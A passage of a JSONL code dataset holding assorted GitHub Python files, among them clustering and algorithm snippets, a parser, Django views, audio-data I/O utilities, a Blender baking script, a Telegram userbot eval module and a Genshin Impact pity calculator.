projection='3d')\nax2.set_title(\"KMeans\")\nax2.scatter(X[:,0],X[:,1],X[:,2],c=y_pred_km,s=20,cmap='RdYlBu')\nplt.show()","repo_name":"KaygoYM/Data-Mining","sub_path":"Data_Mining_DEMO/Clustering/DBSCAN_DEMO.py","file_name":"DBSCAN_DEMO.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"11422246937","text":"\r\nimport nltk\r\nfrom nltk import word_tokenize\r\nfile_path ='C:\\\\Users\\\\user\\\\Desktop\\\\nlp.txt'\r\nwith open(file_path, 'r') as file:\r\n contents = file.read()\r\n tokens=word_tokenize(contents)\r\nfor token in tokens:\r\n print(token)\r\n\r\n\r\n\r\n","repo_name":"samuelkezee/nlp","sub_path":"2tokens.py","file_name":"2tokens.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"43551499334","text":"import heapq\nimport random\nfrom collections import Counter\nfrom typing import List\n\n\n# O(n) time || O(n) space\ndef top_k_frequent_quickselect(self, nums: List[int], k: int) -> List[int]:\n if len(nums) == k:\n return nums\n\n cnt = Counter(nums)\n unique = list(cnt.keys())\n\n def partition(low, high, idx):\n freq = cnt[unique[idx]]\n unique[idx], unique[high] = unique[high], unique[idx]\n\n store_idx = low\n for i in range(low, high):\n if cnt[unique[i]] < freq:\n unique[store_idx], unique[i] = unique[i], unique[store_idx]\n store_idx += 1\n\n unique[high], unique[store_idx] = unique[store_idx], unique[high]\n\n return store_idx\n\n def quick_select(low, high, k_smallest):\n if low == high:\n return\n\n pivot_idx = random.randint(low, high)\n pivot_idx = partition(low, high, pivot_idx)\n\n if k_smallest == pivot_idx:\n return\n elif k_smallest < pivot_idx:\n quick_select(low, pivot_idx - 1, k_smallest)\n else:\n quick_select(pivot_idx + 1, high, k_smallest)\n\n n = len(unique)\n\n quick_select(0, n - 1, n - k)\n\n return unique[n - k:]\n\n\n# O(n * log(k)) time || O(n + k) space\ndef top_k_frequent_heap(self, nums: List[int], k: int) -> List[int]:\n if len(nums) == k:\n return nums\n\n cnt = Counter(nums)\n\n return heapq.nlargest(k, cnt, cnt.get)\n\n\n# O(n) time || O(n) space\ndef top_k_frequent_linear(self, nums: List[int], k: int) -> List[int]:\n if len(nums) == k:\n return nums\n\n cnt = Counter(nums)\n freq = [[] for _ in range(len(nums) + 1)]\n for n, c in cnt.items():\n freq[c].append(n)\n\n res = []\n for i in range(len(freq) - 1, 0, -1):\n for n in freq[i]:\n res.append(n)\n\n if len(res) == k:\n return res\n","repo_name":"solairerove/leetcode-leprosorium-python","sub_path":"arrays/TopKFrequentElements.py","file_name":"TopKFrequentElements.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"26680860223","text":"class ShiftReduceParser:\n SHIFT = 'SHIFT'\n REDUCE = 'REDUCE'\n OK = 'OK'\n\n def __init__(self, G, verbose=False):\n self.G = G\n self.verbose = verbose\n self.action = {}\n self.goto = {}\n self._build_parsing_table()\n\n def _build_parsing_table(self):\n raise NotImplementedError()\n\n def __call__(self, w, get_shift_reduce=False):\n stack = [0]\n cursor = 0\n output = []\n operations = []\n\n while True:\n state = stack[-1]\n lookahead = w[cursor]\n if self.verbose: print(stack, w[cursor:])\n try:\n action, tag = self.action[state, lookahead.token_type.Name][0]\n if action == ShiftReduceParser.SHIFT:\n operations.append(self.SHIFT)\n stack.append(tag)\n cursor += 1\n elif action == ShiftReduceParser.REDUCE:\n operations.append(self.REDUCE)\n for _ in range(len(tag.Right)): stack.pop()\n stack.append(self.goto[stack[-1], tag.Left.Name][0])\n output.append(tag)\n elif action == ShiftReduceParser.OK:\n return output if not get_shift_reduce else (output, operations)\n else:\n assert False, 'Must be something wrong!'\n except KeyError:\n raise ParsingException(\n f'Syntax error near token {lookahead.lex}')\n\n\nclass ParsingException(Exception):\n @property\n def text(self) -> str:\n return self.args[0]\n","repo_name":"adrian13579/CoolInterpreter","sub_path":"cmp/parsers/shift_reduce_parser.py","file_name":"shift_reduce_parser.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"8718557532","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework.decorators import api_view,permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .serializers import BlogSerializer\nfrom .models import Blog\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_all_post(request):\n query_set = Blog.objects.all()\n serializer = BlogSerializer(query_set,many=True)\n return Response({'all_blogs': serializer.data})\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef add_post(request):\n data = request.data\n data['creation_user'] = request.user.first_name + \" \" + request.user.last_name\n #return Response({'Errors': \"erros\"})\n serializer = BlogSerializer(data = data)\n if serializer.is_valid():\n all_post = Blog.objects.create(**data)\n response = BlogSerializer(all_post,many=False)\n return Response({'allPost': response.data})\n else:\n return Response({'Errors': serializer.errors})\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated]) \ndef update_post(request,pk):\n blog = get_object_or_404(Blog,id=pk)\n if not request.data :\n return Response({'Errors':\"You can't be update post due passing parameters failed\"},status=status.HTTP_403_FORBIDDEN)\n blog.name= request.data.get('title')\n blog.content= request.data.get('content')\n blog.save()\n serializer = BlogSerializer(blog,many=False)\n return Response({'postDetails': serializer.data})\n\n@api_view(['DELETE'])\n@permission_classes([IsAuthenticated])\ndef delete_post(request,pk):\n blog = get_object_or_404(Blog,id=pk)\n if blog.creation_user != request.user.first_name +\" \"+ request.user.last_name :\n return Response({'Errors':\"You can't be deleted post\"},status=status.HTTP_403_FORBIDDEN)\n blog.delete()\n return Response({'details':'Products deleted successfully..!'},status= status.HTTP_200_OK)\n","repo_name":"Dileepkumarpatelpalamu/blog-api-jwt","sub_path":"blogapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"37528890471","text":"\"\"\"\nModule to set optimizer\n\"\"\"\nimport tensorflow as tf\nimport horovod.tensorflow as hvd\n\n_ALLOWED_OPTIMIZERS = [\"sgd\", \"sgdm\", \"adam\", \"rmsprop\"]\n\n\ndef get_optimizer(params):\n lr = params[\"learning_rate\"] * hvd.size()\n optimizer_name = params[\"optimizer_name\"]\n if optimizer_name in _ALLOWED_OPTIMIZERS:\n if optimizer_name == \"adam\":\n optimizer = tf.compat.v1.train.AdamOptimizer(\n learning_rate=lr,\n beta1=params[\"beta1\"],\n beta2=params[\"beta2\"],\n epsilon=params[\"epsilon\"],\n name=\"adam\",\n )\n elif optimizer_name == \"rmsprop\":\n optimizer = tf.compat.v1.train.RMSPropOptimizer(\n learning_rate=lr,\n decay=params[\"decay\"],\n epsilon=params[\"epsilon\"],\n name=\"rmsprop\",\n )\n elif optimizer_name == \"sgdm\":\n optimizer = tf.compat.v1.train.MomentumOptimizer(\n learning_rate=lr,\n momentum=params[\"momentum\"],\n name=\"sgd_momentum\",\n )\n elif optimizer_name == \"sgd\":\n optimizer = tf.compat.v1.train.GradientDescentOptimizer(\n learning_rate=lr,\n name=\"sgd\",\n )\n else:\n raise AssertionError(\n f\"Optimizer is in allowed list {_ALLOWED_OPTIMIZERS},\"\n f\"but not defined, passed {optimizer_name}\"\n )\n else:\n raise AssertionError(\n f\"Supported optimizer are {_ALLOWED_OPTIMIZERS},\" f\"passed {optimizer_name}\"\n )\n return hvd.DistributedOptimizer(optimizer)\n","repo_name":"braceal/SC20-GB-CS1-ThetaGPU-AI-driven-MD","sub_path":"deepdrivemd/models/symmetric_cvae/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"29723376654","text":"import h5py\nimport yaml\nimport csv\nimport numpy as np\nimport pandas as pd\nimport os.path as path\n\n\ndef load_csv(file_name, header=None, col_name=None, index_col=None, dtype=None, delim=','):\n \"\"\"\n Read list of rows in csv, separated by delimiter\n # Output\n pandas DataFrame\n \"\"\"\n res = pd.read_csv(file_name, header=header, names=col_name,\n index_col=index_col, dtype=dtype, delimiter=delim)\n return res\n\n\ndef save_csv(file_name, list_data, delim=','):\n \"\"\"Save list of rows to csv, separated by delim\n e.g. list_data=zip(l1, l2, l3)\n \"\"\"\n with open(file_name, 'wt') as f:\n writer = csv.writer(f, delimiter=delim)\n for result_item in list_data:\n write_it = [it for it in result_item if it is not '']\n writer.writerow(write_it)\n\n\ndef load_txt(file_name):\n with open(file_name) as f:\n raw = f.readlines()\n lines = [s.strip() for s in raw]\n return lines\n\n\ndef load_yaml(file_name):\n with open(file_name, 'r') as f:\n return yaml.load(f)\n\n\ndef load_dictionary(file_name, delim=' '):\n \"\"\"\n Load text file as dictionary:\n 1st column are keys, the rest columns are values\n \"\"\"\n d = {}\n with open(file_name) as f:\n for line in f:\n sl = line.split(delim)\n clean_list = map(str.strip, sl)\n d[clean_list[0]] = clean_list[1:]\n return d\n\n\ndef load_mlf(file_name, lab_ext='lab'):\n \"\"\"\n Load Master Label Files (MLF), e.g. applied in HTK toolkit or KALDI\n file_name: file path to the MLF\n lab_ext: extension of aligned audio files inside MLF file\n # Output\n dictionary: {file_id: list_of_events}\n \"\"\"\n mlf_dict = {}\n with open(file_name) as f:\n header = f.next().strip()\n if header != '#!MLF!#':\n raise AttributeError('[ERROR] Header is not defined %s' % header)\n\n fid_now = None\n events = []\n for line in f:\n line = line.strip()\n if '.' + lab_ext in line: # file alignment name\n fpath = line.replace('\"', '')\n base = path.basename(fpath)\n fid_now = path.splitext(base)[0]\n elif line == '.': # end of alignment\n mlf_dict[fid_now] = events\n events = []\n fid_now = None\n else:\n event = line.split()\n events.append(event)\n return mlf_dict\n\n\ndef save_mlf(file_name, mlf_dict, lab_ext='lab'):\n \"\"\"\n Load Master Label Files (MLF), e.g. applied in HTK toolkit or KALDI\n file_name: file path to the MLF\n mlf_dict: dictionary. {file_id: list_of_events}\n lab_ext: extension of aligned files inside MLF file\n \"\"\"\n header = '#!MLF!#\\n'\n end = '.\\n'\n with open(file_name, 'w') as f:\n f.write(header)\n\n for file_id, events in mlf_dict.items():\n fname = '\"*/%s.%s\"\\n' % (file_id, lab_ext)\n f.write(fname)\n for ev in events:\n f.write(' '.join(ev) + '\\n')\n f.write(end)\n\n\ndef save_ark(file_name, utt_feat):\n with open(file_name, 'w') as file:\n for utt, feats in utt_feat.items():\n head = \"%s [\" % utt\n txt_feat = \"\\n \".join(\" \".join(str(i) for i in x) for x in feats)\n file.write(\"%s \\n %s ]\\n\" % (head, txt_feat))\n\n\nclass HDFWriter(object):\n \"\"\"\n Save data features in single hdf5 file storage\n file_name: String. Hdf5 file storage name\n \"\"\"\n\n def __init__(self, file_name):\n self.hdf = h5py.File(file_name, \"w\")\n\n def append(self, file_id, feat, tag=None):\n \"\"\"\n file_id: unique identifier of the data feature file\n tag: hot-encoded 1D array, where '1' marks class on\n \"\"\"\n if file_id in self.hdf.keys():\n print('[WARN] File already exists in the storage: %s' % file_id)\n else:\n # if file not exists then store it to hdf\n data = self.hdf.create_dataset(name=file_id, data=feat)\n if tag is not None:\n data.attrs['tag'] = tag\n\n def close(self):\n self.hdf.close()\n\n @staticmethod\n def load_data(file_name, keys=None):\n \"\"\"\n Lazy load all datasets from hdf5 to the memory\n NOTE: not preferred to run for large dataset\n file_name: String. Path to hdf5 file storage\n keys: list. List of file ids\n \"\"\"\n hdf = h5py.File(file_name, \"r\")\n if keys is None:\n files = list(hdf.keys())\n print('Files in dataset: %d' % len(files))\n else:\n files = keys\n print('Files by keys: %d' % len(files))\n\n X, Y = [], []\n for fn in hdf:\n X.append(np.array(hdf[fn]))\n Y.append(hdf[fn].attrs['tag'])\n hdf.close()\n return np.array(X), np.array(Y)\n\n\nclass ArkReader(object):\n START_MARK = '['\n END_MARK = ']'\n\n def __init__(self, data_file):\n self.data_file = data_file\n\n @staticmethod\n def grep(data_file, pattern='['):\n with open(data_file, 'r') as file:\n match = [line for line in file if pattern in line]\n return match\n\n @staticmethod\n def ark_len(data_file):\n match = ArkReader.grep(data_file, ArkReader.START_MARK)\n return len(match)\n\n def next_ark(self):\n \"\"\"\n Read file with arks: every ark file one-by-one\n # Return\n file_id, features ndarray\n \"\"\"\n cnt = 0\n with open(self.data_file, 'r') as file:\n utt = ''\n feats = []\n for line in file:\n # start of the features\n if ArkReader.START_MARK in line:\n utt = line.strip().split()[0]\n cnt += 1\n # end of the features\n elif ArkReader.END_MARK in line:\n tmp = line.replace(ArkReader.END_MARK, '')\n tmp = tmp.strip().split()\n feats.append(tmp)\n # return current ark file\n yield utt, self._str2float(feats)\n utt = ''\n feats = []\n else:\n # read features\n feats.append(line.strip().split())\n\n def _str2float(self, arr):\n return np.array(arr).astype(np.float)\n\n\nclass ArkWriter(object):\n START_MARK = '['\n END_MARK = ']'\n\n def __init__(self, data_file):\n self.ark_file = open(data_file)\n\n def append(self, utt_feat):\n utt, feat = utt_feat\n head = '%s [' % utt\n txt_feat = '\\n '.join(' '.join(str(i) for i in x) for x in feat)\n self.ark_file.write('%s \\n %s ]\\n' % (head, txt_feat))\n\n def close(self):\n self.ark_file.close()\n","repo_name":"Vanova/mfom_attribute_detection","sub_path":"src/utils/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":6823,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"45"} +{"seq_id":"23389032048","text":"# Bake vertex colors to texture image\n# Run with: blender -b -P bake_vertex_colors_to_texture_image.py -- INPUT_PLY OUTPUT_OBJ\n# Tested with blender 3.0.0\n# Input: PLY format with vertex color attributes i.e. rgb channels\n# Output: OBJ format with texture image\n\nimport bpy\nimport argparse\nimport sys\nimport os\n\nindex = sys.argv.index('--')\n\nparser = argparse.ArgumentParser(\n description='Bake vertex colors to texture image')\nparser.add_argument('INPUT_PLY', type=str,\n help='Input PLY File')\nparser.add_argument('OUTPUT_OBJ', type=str,\n help='Output OBJ File')\n\nargs = parser.parse_args(sys.argv[index:])\ninput_ply = args.INPUT_PLY\noutput_obj = args.OUTPUT_OBJ\nname, _ = os.path.splitext(output_obj)\noutput_png = '{}.png'.format(name)\noutput_mtl = '{}.mtl'.format(name)\n\nprint('Input PLY: {}'.format(input_ply))\nprint('Output OBJ: {}'.format(output_obj))\nprint('Output PNG: {}'.format(output_png))\nprint('Output MTL: {}'.format(output_mtl))\n\n# https://docs.blender.org/api/current/bpy.data.html\nprint('Remove default cube mesh')\nif \"Cube\" in bpy.data.meshes:\n mesh = bpy.data.meshes[\"Cube\"]\n bpy.data.meshes.remove(mesh)\n\nprint('Import PLY')\nbpy.ops.import_mesh.ply(\n filepath=input_ply)\n\nprint('Toggle edit mode')\nbpy.ops.object.editmode_toggle()\n\nprint('UV smart project')\nbpy.ops.uv.smart_project()\n\n# https://blender.stackexchange.com/questions/5668/add-nodes-to-material-with-python\nprint('Add shading material')\nmaterial = bpy.data.materials.new('SomeMaterial')\nmaterial.use_nodes = True\nnodes = material.node_tree.nodes\n\nprint('Toggle edit mode')\nbpy.ops.object.editmode_toggle()\n\nprint('Add input vertex color')\ninput_node = nodes.new('ShaderNodeVertexColor')\nbsdf_node = nodes.get('Principled BSDF')\n\nprint('Link vertex color to bsdf')\nmaterial.node_tree.links.new(bsdf_node.inputs[0], input_node.outputs[0])\n\nprint('Add texture image')\ntexture_node = nodes.new('ShaderNodeTexImage')\n\nprint('Create empty image')\nimage = bpy.data.images.new(name='SomeImage', width=1024, height=1024)\n\nprint('Assign image to node')\ntexture_node.image = image\n\nprint('Switch to CYCLES render engine')\nbpy.context.scene.render.engine = 'CYCLES'\n\nprint('Select active material')\nbpy.context.active_object.active_material = material\n\nprint('Bake image')\nbpy.context.view_layer.objects.active = bpy.context.active_object\nbpy.ops.object.bake(type='DIFFUSE',\n pass_filter={'COLOR'}, use_clear=True)\n\nprint('Save image')\nimage.save_render(output_png)\n\n# set map_Kd correctly in mtl file\nprint('Set image path')\nimage.filepath = os.path.basename(output_png)\n\nprint('Connect texture node to bsdf')\nmaterial.node_tree.links.new(bsdf_node.inputs[0], texture_node.outputs[0])\n\nprint('Export OBJ')\nbpy.ops.export_scene.obj(filepath=output_obj)\n","repo_name":"jiegec/blender-scripts","sub_path":"bake_vertex_colors_to_texture_image.py","file_name":"bake_vertex_colors_to_texture_image.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"73752816456","text":"from dataclasses import dataclass, field\nfrom typing import Optional\nfrom nova.kontroll_element_format import KontrollElementFormat\nfrom nova.sprach_code import SprachCode\n\n__NAMESPACE__ = \"http://nova.voev.ch/services/v14/vertrieb\"\n\n\n@dataclass\nclass KontrollElementParameter:\n \"\"\"\n :ivar sprache: Moegliche Werte: DE, EN, IT, FR\n :ivar format: Moegliche Werte: PNG, RAW\n \"\"\"\n sprache: Optional[SprachCode] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"namespace\": \"http://nova.voev.ch/services/v14/vertrieb\",\n }\n )\n format: Optional[KontrollElementFormat] = field(\n default=None,\n metadata={\n \"type\": \"Attribute\",\n \"namespace\": \"http://nova.voev.ch/services/v14/vertrieb\",\n }\n )\n","repo_name":"openTdataCH/ojp-nova","sub_path":"nova/kontroll_element_parameter.py","file_name":"kontroll_element_parameter.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"13574596559","text":"import itertools\nimport logging\nfrom traceback import format_exc\nfrom types import ModuleType\nimport os\n\nimport telethon\nfrom meval import meval\nfrom telethon.errors.rpcerrorlist import MessageIdInvalidError\nfrom telethon.tl.types import Message\n\nfrom .. import loader, main, utils\nfrom ..inline.types import InlineCall\n\nlogger = logging.getLogger(__name__)\n\n\nclass FakeDbException(Exception):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\nclass FakeDb:\n def __getattr__(self, *args, **kwargs):\n raise FakeDbException(\"Database read-write permission required\")\n\n\n@loader.tds\nclass PythonMod(loader.Module):\n \"\"\"Evaluates python code\"\"\"\n\n strings = {\n \"name\": \"Python\",\n \"eval\": \"🎬 Code:\\n{}\\n🪄 Result:\\n{}\",\n \"err\": \"🎬 Code:\\n{}\\n\\n🚫 Error:\\n{}\",\n \"db_permission\": (\n \"⚠️ Do not use db.set, db.get \"\n \"and other db operations. You have core modules to control anything you \"\n \"want\\n\\nTheses commands may crash your userbot or \"\n \"even make it unusable! Do it on your own risk\\n\\n\"\n \"If you issue any errors after allowing this option, you will not \"\n \"get any help in support chat!\"\n ),\n }\n\n strings_ru = {\n \"eval\": \"🎬 Код:\\n{}\\n🪄 Результат:\\n{}\",\n \"err\": \"🎬 Код:\\n{}\\n\\n🚫 Ошибка:\\n{}\",\n \"db_permission\": (\n \"⚠️ Не используй db.set, db.get \"\n \"и другие операции с базой данных. У тебя есть встроенные модуля для управления ей\\n\\n\"\n \"Эти команды могут нарушить работу юзербота, или вообще сломать\"\n \" его! Используй эти команды на свой страх и риск\\n\\nЕсли появятся какие-либо \"\n \"проблемы, вызванные после этой команды, ты не получишь помощи в чате!\"\n ),\n \"_cmd_doc_eval\": \"Алиас для команды .e\",\n \"_cmd_doc_e\": \"Выполняет Python кодировка\",\n \"_cls_doc\": \"Выполняет Python код\",\n }\n\n async def client_ready(self, client, db):\n self._client = client\n self._db = db\n self._phone = (await client.get_me()).phone\n\n @loader.owner\n async def evalcmd(self, message: Message):\n \"\"\"Alias for .e command\"\"\"\n await self.ecmd(message)\n\n async def inline__allow(self, call: InlineCall):\n await call.answer(\"Now you can access db through .e command\", show_alert=True)\n self._db.set(main.__name__, \"enable_db_eval\", True)\n await call.delete()\n\n @loader.owner\n async def ecmd(self, message: Message):\n \"\"\"Evaluates python code\"\"\"\n ret = self.strings(\"eval\")\n try:\n it = await meval(\n utils.get_args_raw(message),\n globals(),\n **await self.getattrs(message),\n )\n except FakeDbException:\n await self.inline.form(\n self.strings(\"db_permission\"),\n message=message,\n reply_markup=[\n [\n {\n \"text\": \"✅ Allow\",\n \"callback\": self.inline__allow,\n },\n {\"text\": \"🚫 Cancel\", \"action\": \"close\"},\n ]\n ],\n )\n return\n except Exception:\n exc = format_exc().replace(self._phone, \"📵\")\n\n if os.environ.get(\"DATABASE_URL\"):\n exc = exc.replace(\n os.environ.get(\"DATABASE_URL\"),\n \"postgre://**************************\",\n )\n\n if os.environ.get(\"hikka_session\"):\n exc = exc.replace(\n os.environ.get(\"hikka_session\"),\n \"StringSession(**************************)\",\n )\n\n await utils.answer(\n message,\n self.strings(\"err\").format(\n utils.escape_html(utils.get_args_raw(message)),\n utils.escape_html(exc),\n ),\n )\n\n return\n ret = ret.format(\n utils.escape_html(utils.get_args_raw(message)),\n utils.escape_html(it),\n )\n ret = ret.replace(str(self._phone), \"📵\")\n\n postgre = os.environ.get(\"DATABASE_URL\") or main.get_config_key(\"postgre_uri\")\n if postgre:\n ret = ret.replace(postgre, \"postgre://**************************\")\n\n redis = os.environ.get(\"REDIS_URL\") or main.get_config_key(\"redis_uri\")\n if redis:\n ret = ret.replace(redis, \"redis://**************************\")\n\n if os.environ.get(\"hikka_session\"):\n ret = ret.replace(\n os.environ.get(\"hikka_session\"),\n \"StringSession(**************************)\",\n )\n\n try:\n await utils.answer(message, ret)\n except MessageIdInvalidError:\n pass\n\n async def getattrs(self, message):\n reply = await message.get_reply_message()\n return {\n **{\n \"message\": message,\n \"client\": self._client,\n \"reply\": reply,\n \"r\": reply,\n **self.get_sub(telethon.tl.types),\n **self.get_sub(telethon.tl.functions),\n \"event\": message,\n \"chat\": message.to_id,\n \"telethon\": telethon,\n \"utils\": utils,\n \"main\": main,\n \"loader\": loader,\n \"f\": telethon.tl.functions,\n \"c\": self._client,\n \"m\": message,\n \"lookup\": self.lookup,\n \"self\": self,\n },\n **(\n {\n \"db\": self._db,\n }\n if self._db.get(main.__name__, \"enable_db_eval\", False)\n else {\n \"db\": FakeDb(),\n }\n ),\n }\n\n def get_sub(self, it, _depth: int = 1) -> dict:\n \"\"\"Get all callable capitalised objects in an object recursively, ignoring _*\"\"\"\n return {\n **dict(\n filter(\n lambda x: x[0][0] != \"_\"\n and x[0][0].upper() == x[0][0]\n and callable(x[1]),\n it.__dict__.items(),\n )\n ),\n **dict(\n itertools.chain.from_iterable(\n [\n self.get_sub(y[1], _depth + 1).items()\n for y in filter(\n lambda x: x[0][0] != \"_\"\n and isinstance(x[1], ModuleType)\n and x[1] != it\n and x[1].__package__.rsplit(\".\", _depth)[0]\n == \"telethon.tl\",\n it.__dict__.items(),\n )\n ]\n )\n ),\n }\n","repo_name":"Netuzb/sosi","sub_path":"hikka/modules/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":7684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"33264352834","text":"import genshinstats as gs\nimport genshin as gs_\nimport os, time, json, sys\nfrom dotenv import load_dotenv\nfrom time import sleep\n\nload_dotenv(dotenv_path='settings.env')\n\nwith open(f'lang/{os.getenv(\"lan\")}.json', 'r', encoding='utf-8') as lang:\n lang = json.load(lang)\n ID = lang['id']\n ERROR = lang['error_banner']\n PITY5 = lang['5*pity']\n PITY4 = lang['4*pity']\n REPEAT_ERROR = lang['repeat_error']\n REPEAT_ERROR2 = lang['repeat_error2']\n REPEAT = lang['repeat']\n REPEAT_W = lang['repeat_w']\n AUTH_ERROR = lang['auth_error']\n AUTH_TIMEOUT = lang['auth_timeout']\n QUIT_ = lang['quit']\n LAST = lang['last']\n NO_WISH_HISTORY_ERROR = lang['no_wish_history_error']\n NO_WISH_HISTORY_ERROR2 = lang['no_wish_history_error2']\n SOFT = lang['soft']\n TSOFT = lang['tsoft']\n CACHE = lang['cache']\n LCACHE = lang['load_cache']\n NOCACHE = lang['no_cache']\n NEXT = lang['next']\n PERMS_ERROR = lang['perms_error']\n\ndef search_string_in_file(file_name, string_to_search):\n line_number = 0\n list_of_results = []\n with open(file_name, 'r') as read_obj:\n for line in read_obj:\n line_number += 1\n if string_to_search in line:\n list_of_results.append((line_number, line.rstrip()))\n read_obj.close()\n return list_of_results\n\nif os.getenv('cache') == \"True\":\n if os.path.exists(f'{os.environ[\"APPDATA\"]}/nitolar play') == False:\n os.mkdir(f'{os.environ[\"APPDATA\"]}/nitolar play')\n os.mkdir(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc')\n else:\n if os.path.exists(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc') == False:\n os.mkdir(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc')\n\n# https://webstatic-sea.hoyoverse.com/genshin/ - 44\n\nglobal S_MSG\nS_MSG = False\n\nif os.getenv('authkey')[0:44] != 'https://webstatic-sea.hoyoverse.com/genshin/':\n if os.getenv('authkey') == 'auto':\n if os.getenv('gameloc') == \"None\":\n try:\n AUTH = gs_.utility.get_authkey()\n except PermissionError:\n print('\\33[31m' + PERMS_ERROR + '\\33[0m')\n AUTH = \"sus\"\n S_MSG = True\n else:\n try:\n AUTH = gs_.utility.get_authkey(os.getenv('gameloc'))\n except PermissionError:\n print('\\33[31m' + PERMS_ERROR + '\\33[0m')\n AUTH = \"sus\"\n S_MSG = True\n else:\n print('\\33[31m' + AUTH_ERROR + '\\33[0m')\n quit()\nelse:\n AUTH = gs.extract_authkey(os.getenv('authkey'))\n\nREPEAT_FLAG = os.getenv('repeat')\nr_a = ['ask', 'no', 'yes']\n\nif REPEAT_FLAG not in r_a:\n print('\\33[31m' + REPEAT_ERROR + '\\33[0m')\n quit()\n\nglobal BANNER\nBANNER = 301\n\ndef check_():\n if os.path.exists('log.txt') == True:\n os.remove('log.txt')\n\n list_rec = 90\n if BANNER == 302:\n list_rec = 80\n\n for s in gs.get_wish_history(BANNER, 200, authkey=AUTH):\n with open('log.txt', \"a+\", encoding='utf-8') as file:\n file.write(f\"{s['rarity']}* - {s['name']}, {s['type']}\" + '\\n')\n file.close()\n\n print(time.strftime('%H:%M:%S'))\n\n star5_ = search_string_in_file('log.txt', '5* - ')\n\n dict_prc = {74: '6.6%', 75: '12.6%', 76: '18.6%', 77: '24.6%', 78: '30.6%', 79: '36.6%', 80: '42.6%', 81: '48.6%', 82: '54.6%', 83: '60.6%', 84: '66.6%', 85: '72.6%', 86: '78.6%', 87: '84.6%', 88: '90.6%', 89: '96.6%', 90: '100%'}\n\n load = False\n\n if str(star5_) == '[]':\n if os.path.exists(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc/{BANNER}.json') == True:\n with open(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc/{BANNER}.json', \"r\", encoding='utf-8') as data_:\n data = json.load(data_)\n print('\\33[93m' + CACHE + '\\33[0m')\n isoft = int(data['5*'][0]['soft'])\n if list_rec == 80:\n if isoft >= 63:\n isoft = isoft + 11\n print(f'\\33[92m{SOFT.replace(\"?num?\", \"64\")} {dict_prc[isoft]}\\33[34m')\n else:\n print(f'\\33[92m{TSOFT.replace(\"?num?\", f\"{63 - isoft}\")}\\33[34m')\n else:\n if isoft >= 73:\n isoft = isoft + 1\n print(f'\\33[92m{SOFT.replace(\"?num?\", \"74\")} {dict_prc[isoft]}\\33[34m')\n else:\n print(f'\\33[92m{TSOFT.replace(\"?num?\", f\"{73 - isoft}\")}\\33[34m')\n \n print(f'{PITY5}' + f'{data[\"5*\"][0][\"pity\"]}' + f'\\n{LAST} 5*: ' + f'{data[\"5*\"][0][\"last\"]}')\n if data[\"5*\"][0][\"next\"] != None:\n print(f'{NEXT.replace(\"?star?\", \"5*\")}' + f'{data[\"5*\"][0][\"next\"]}')\n data_.close()\n load = True\n else:\n print(f'{PITY5}' + f'{NO_WISH_HISTORY_ERROR} 5*' + f'\\n{LAST} 5*: ' + NO_WISH_HISTORY_ERROR2)\n load = True\n\n n5star = None\n\n for star5 in star5_:\n n_star5 = list_rec - int(star5[0]) + 1\n if n_star5 <= 0:\n n_star5 = 1\n\n isoft = list_rec - n_star5\n if list_rec == 90:\n if isoft >= 73:\n isoft = isoft + 1\n print(f'\\33[92m{SOFT.replace(\"?num?\", \"74\")} {dict_prc[isoft]}\\33[34m')\n else:\n print(f'\\33[92m{TSOFT.replace(\"?num?\", f\"{73 - isoft}\")}\\33[34m')\n else:\n if isoft >= 63:\n isoft = isoft + 11\n print(f'\\33[92m{SOFT.replace(\"?num?\", \"64\")} {dict_prc[isoft]}\\33[34m')\n else:\n print(f'\\33[92m{TSOFT.replace(\"?num?\", f\"{63 - isoft}\")}\\33[34m')\n\n print(f'{PITY5}' + f'{n_star5} / {list_rec}' + f'\\n{LAST} 5*: ' + star5[1][5:])\n if BANNER == 200:\n if f'{star5_[0]}'[-3] == 'r' and f'{star5_[1]}'[-3] == 'r':\n print(f'{NEXT.replace(\"?star?\", \"5*\")}' + 'Weapon')\n n5star = 'Weapon'\n elif f'{star5_[0]}'[-3] == 'n' and f'{star5_[1]}'[-3] == 'n':\n print(f'{NEXT.replace(\"?star?\", \"5*\")}' + 'Character')\n n5star = 'Character'\n break\n\n star4_ = search_string_in_file('log.txt', '4* - ')\n\n if str(star4_) == '[]':\n if os.path.exists(f'{os.environ[\"APPDATA\"]}/nitolar play/pity calc/{BANNER}.json') == True:\n with 